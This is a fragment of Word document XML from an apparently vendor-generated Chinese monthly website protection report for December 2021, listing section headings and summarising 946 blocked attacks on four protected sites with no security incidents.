        <w:p w:rsidP="00C46994" w:rsidR="00C46994" w:rsidRDefault="008F57F9">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:pos="420" w:val="left"/>
              <w:tab w:leader="dot" w:pos="8296" w:val="right"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc531180265" w:history="1">
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安全风险详情分析</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc531180265 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidP="00C46994" w:rsidR="00C46994" w:rsidRDefault="008F57F9">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:pos="1260" w:val="left"/>
              <w:tab w:leader="dot" w:pos="8296" w:val="right"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc531180266" w:history="1">
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>攻击类型详情分析</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc531180266 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidP="00C46994" w:rsidR="00C46994" w:rsidRDefault="008F57F9">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:pos="1260" w:val="left"/>
              <w:tab w:leader="dot" w:pos="8296" w:val="right"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc531180267" w:history="1">
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>攻击源</w:t>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TOP 10</w:t>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc531180267 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidP="00C46994" w:rsidR="00C46994" w:rsidRDefault="008F57F9">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:pos="1260" w:val="left"/>
              <w:tab w:leader="dot" w:pos="8296" w:val="right"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc531180268" w:history="1">
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>攻击区域详情分析</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc531180268 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidP="00C46994" w:rsidR="00C46994" w:rsidRDefault="008F57F9">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:pos="420" w:val="left"/>
              <w:tab w:leader="dot" w:pos="8296" w:val="right"/>
            </w:tabs>
            <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc531180269" w:history="1">
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994" w:rsidRPr="00321B67">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安全建议须知</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc531180269 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C46994">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidP="00C46994" w:rsidR="0074232F" w:rsidRDefault="0074232F">
          <w:pPr>
            <w:spacing w:line="360" w:lineRule="auto"/>
          </w:pPr>
          <w:r w:rsidRPr="003C7346">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidP="007159E2" w:rsidR="004D76AB" w:rsidRDefault="004D76AB" w:rsidRPr="007159E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidP="004D76AB" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc531180259"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安全风险概况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00C82032" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>防护时段</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】：</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2021-12-01 00:00:00 至 2021-12-31 23:59:59;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00C82032" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护范围</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>(www.dingxinsec.com.cn)等共4个网站，其中2个已解析，2个未解析；</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00C82032" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>本月所有攻击均已被玄武盾拦截，网站共出现0起安全事件；</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00C82032" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整体安全趋势</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DC0775" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>本月网站群共计受到攻击946次，较上月--，攻击趋势有所--；</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="OLE_LINK51"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00004C4B" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>风暴中心</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的专业、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>稳定云</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护服务下，网站所有攻击均被有效阻断，未造成攻击成功或篡改成功的安全事件，有效地保障网站安全、平稳地运行。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc518464531"/>
      <w:bookmarkStart w:id="6" w:name="_Toc531180260"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全趋势</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中拦截到的攻击次数越多，表示网络环境遭受黑客攻击的次数越多，网络环境越不安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>黑客能成功入侵的可能性越大，使用</w:t>
      </w:r>
      <w:r w:rsidR="00004C4B" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>玄武盾云防护</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>系统能有效抵御黑客利用已存在漏洞发起的攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>每日攻击趋势图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00DC0775" w:rsidRDefault="00DC0775" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distR="0">
            <wp:extent cx="5274310" cy="3178575"/>
            <wp:effectExtent l="19050" t="0" r="21590" b="0"/>
            <wp:docPr id="1" name="Chart 1"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" r:id="rId12"/>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
